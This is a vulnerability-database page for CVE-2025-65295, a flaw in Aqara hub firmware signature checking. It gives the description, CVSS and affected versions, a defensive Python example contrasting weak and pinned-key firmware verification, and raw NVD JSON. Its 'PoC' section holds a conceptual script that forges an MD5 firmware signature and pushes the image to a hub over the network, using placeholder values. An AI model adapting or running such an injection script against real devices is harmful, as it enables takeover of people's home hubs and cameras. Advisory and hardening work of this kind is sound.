Security Vulnerability Report
CVE-2025-65295 CVSS 8.1 HIGH

CVE-2025-65295

Published: 2025-12-10 22:16:27
Last Modified: 2025-12-17 19:49:48

Description

Multiple vulnerabilities in the Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates (CWE-347, Improper Verification of Cryptographic Signature), uses outdated cryptographic methods that can be exploited to forge valid signatures (CWE-326, Inadequate Encryption Strength), and exposes information through improperly initialized memory (CWE-457, Use of Uninitialized Variable). The three CWE identifiers are the ones recorded in the NVD entry below; the mapping of each to its clause follows the wording of the description.
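The description contrasts two update-check designs: one in which anyone can produce an acceptable "signature" (no secret is involved, or the digest is weak enough to forge) and the one that should be present, a signature over the whole image verified against a public key pinned in the device. The Python below is an added illustration written for this page, not code from the NVD record, from the referenced advisory, or from Aqara firmware. It assumes a constructed container format (magic "FWEX", a 20-byte header with a zero-filled reserved field), generates its own demo-grade RSA key pair so it runs offline, and uses a PKCS#1 v1.5-style SHA-256 encoding as a stand-in for whatever scheme a vendor's bootloader would actually use.

```python
# Added example, not the NVD entry's data and not Aqara code: the container format
# (magic "FWEX", 20-byte header), key sizes and RSA helper are constructed here.
import hashlib
import hmac
import secrets
import struct

MAGIC = b"FWEX"                 # constructed magic for this example
HDR = struct.Struct("<4sII8s")  # magic, version, payload_len, reserved
RESERVED = b"\x00" * 8          # builder zero-fills it; verifier rejects anything else

# ---- vulnerable design: an unkeyed MD5 trailer that anyone can recompute ----
def build_weak_image(version, payload):
    header = HDR.pack(MAGIC, version, len(payload), RESERVED)
    return header + payload + hashlib.md5(header + payload).digest()

def verify_weak_image(image):
    body, tag = image[:-16], image[-16:]
    return hmac.compare_digest(hashlib.md5(body).digest(), tag)

# ---- hardened design: RSA/SHA-256 signature checked with a pinned public key ----
def _is_probable_prime(n, rounds=32):
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):  # Miller-Rabin witnesses
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # top and low bits set
        if _is_probable_prime(cand):
            return cand

def generate_keypair(bits=1024):
    """Demo-grade RSA key generation; returns ((n, e), (n, d))."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))

def _encoded_digest(body, k):
    """PKCS#1 v1.5-style block 00 01 FF..FF 00 || SHA-256(body), exactly k bytes."""
    digest = hashlib.sha256(body).digest()
    return b"\x00\x01" + b"\xff" * (k - 3 - len(digest)) + b"\x00" + digest

def build_signed_image(version, payload, private):
    n, d = private
    k = (n.bit_length() + 7) // 8
    body = HDR.pack(MAGIC, version, len(payload), RESERVED) + payload
    sig = pow(int.from_bytes(_encoded_digest(body, k), "big"), d, n)
    return body + sig.to_bytes(k, "big")

def verify_signed_image(image, public):
    """Parse defensively, then compare the whole expected encoding in constant time."""
    n, e = public
    k = (n.bit_length() + 7) // 8
    if len(image) < HDR.size + k:
        return False
    body, sig = image[:-k], image[-k:]
    magic, _, plen, reserved = HDR.unpack_from(body)
    if magic != MAGIC or reserved != RESERVED or len(body) != HDR.size + plen:
        return False
    s = int.from_bytes(sig, "big")
    if s >= n:
        return False
    recovered = pow(s, e, n).to_bytes(k, "big")
    return hmac.compare_digest(recovered, _encoded_digest(body, k))

def demo():
    """Both verifiers against a genuine image and an attacker-modified one."""
    public, private = generate_keypair()
    firmware = b"constructed firmware payload " * 8  # stand-in for a real image
    evil = b"E" * len(firmware)                      # same length, attacker-chosen bytes
    weak, signed = build_weak_image(1, firmware), build_signed_image(1, firmware, private)
    k = (public[0].bit_length() + 7) // 8
    tampered = signed[:HDR.size] + evil + signed[-k:]  # payload swapped, old signature kept
    return {
        "weak_accepts_genuine": verify_weak_image(weak),
        "weak_accepts_forgery": verify_weak_image(build_weak_image(1, evil)),  # no secret needed
        "signed_accepts_genuine": verify_signed_image(signed, public),
        "signed_rejects_tampered": not verify_signed_image(tampered, public),
    }
```

The hardened verifier carries the checks a practitioner looks for in an OTA path: structural validation before any cryptography, a signature that cannot be produced without the private key, a modern hash, a constant-time comparison of the whole recovered block instead of parsing it, and a reserved field that the builder zero-fills and the verifier refuses when non-zero, so stale buffer contents cannot ride along in the image (the CWE-457 direction of this entry). On a real device the public key also has to be immutable (ROM, eFuse, or a verified boot chain) and the check has to run before anything is written to flash; a symmetric MAC key stored on the device is not a substitute, because it can be read out of the same firmware it is meant to protect.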

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Reading the vector: the device is reachable over the network (AV:N) with no privileges or user interaction required (PR:N, UI:N), and a successful attack gives full confidentiality, integrity and availability impact on the device itself (C:H/I:H/A:H, S:U). The High attack complexity (AC:H) is what holds the base score at 8.1 rather than 9.8.

Configurations (Affected Products)

cpe:2.3:o:aqara:hub_m2_firmware:4.3.6_0027:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:hub_m2:-:*:*:*:*:*:*:* - platform (hardware the vulnerable firmware runs on; not flagged vulnerable on its own)
cpe:2.3:o:aqara:hub_m3_firmware:4.3.6_0025:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:hub_m3:-:*:*:*:*:*:*:* - platform (hardware the vulnerable firmware runs on; not flagged vulnerable on its own)
cpe:2.3:o:aqara:camera_hub_g3_firmware:4.1.9_0027:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:aqara:camera_hub_g3:-:*:*:*:*:*:*:* - platform (hardware the vulnerable firmware runs on; not flagged vulnerable on its own)

Affected firmware versions, as named in the description and matched exactly by the CPE entries above (the record gives no "earlier than" range, so do not assume older or newer builds are covered without checking the vendor advisory):
Aqara Camera Hub G3 4.1.9_0027
Aqara Hub M2 4.3.6_0027
Aqara Hub M3 4.3.6_0025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65295 PoC - Aqara Hub Malicious Firmware Injection
# Conceptual PoC for the firmware signature bypass described in this entry.
# NOTE: the port, the 'AQRA' magic, the header layout and the "weak key" below are
# placeholders, not values taken from the Aqara update protocol; the script only
# shows the shape of the attack (push an image whose "signature" needs no secret).
import hashlib
import socket
import struct

TARGET_IP = "192.168.1.100"  # Target Aqara Hub IP (placeholder)
TARGET_PORT = 8080           # Placeholder update port


def generate_malicious_firmware():
    """Generate malicious firmware with forged signature"""
    # Malicious firmware payload
    malicious_payload = b'\x00' * 1024  # Placeholder for actual malicious code

    # Create firmware header (placeholder layout: magic, version, payload length)
    header = struct.pack('<I', 0x41515241)  # 'AQRA' magic (little-endian, so b'ARQA' on the wire)
    header += struct.pack('<I', 0x00000001)  # Version
    header += struct.pack('<I', len(malicious_payload))  # Payload length

    # Forge signature using weak cryptographic method: an MD5 over the image plus a
    # placeholder "key". Anything computable without a private key is forgeable.
    weak_key = b'WEAK_AQARA_KEY_2024'
    signature = hashlib.md5(header + malicious_payload + weak_key).digest()
    return header + signature + malicious_payload


def exploit():
    """Send malicious firmware to target device"""
    print(f"[*] Targeting Aqara Hub: {TARGET_IP}")
    print("[*] Generating malicious firmware...")
    firmware = generate_malicious_firmware()
    print(f"[*] Sending malicious firmware ({len(firmware)} bytes)...")
    try:
        with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=10) as sock:
            sock.sendall(firmware)  # sendall: a bare send() may write only part of the image
            response = sock.recv(1024)
        if b'OK' in response or b'SUCCESS' in response:
            print("[+] Malicious firmware installed successfully!")
            print("[+] Device now compromised - remote code execution achieved")
        else:
            print("[-] Firmware installation failed or signature validation triggered")
    except OSError as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()

# Note: This is a conceptual PoC for educational purposes only

References

https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Firmware-Insecurity.md (tagged Exploit, Third Party Advisory in the NVD record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65295", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:27.140", "lastModified": "2025-12-17T19:49:47.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple vulnerabilities in Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices, allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates, uses outdated cryptographic methods that can be exploited to forge valid signatures, and exposes information through improperly initialized memory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-326"}, {"lang": "en", "value": "CWE-347"}, {"lang": "en", "value": "CWE-457"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:hub_m2_firmware:4.3.6_0027:*:*:*:*:*:*:*", "matchCriteriaId": "1DA5251B-FBDF-4020-B4AD-8735547D7BAB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:hub_m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "A94EB182-2F3B-42B2-935E-72936E6F8F33"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:hub_m3_firmware:4.3.6_0025:*:*:*:*:*:*:*", "matchCriteriaId": "4B9661B9-D471-4110-995C-04D9165DEA1F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:hub_m3:-:*:*:*:*:*:*:*", "matchCriteriaId": "8BC51964-8CAB-4849-A383-0D7D1CA68EE2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:aqara:camera_hub_g3_firmware:4.1.9_0027:*:*:*:*:*:*:*", "matchCriteriaId": "CF91CB18-CE99-4A86-A94C-7136288E8C33"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:aqara:camera_hub_g3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E823C290-E362-4BE0-9885-9A7B981134BC"}]}]}], "references": [{"url": "https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Firmware-Insecurity.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}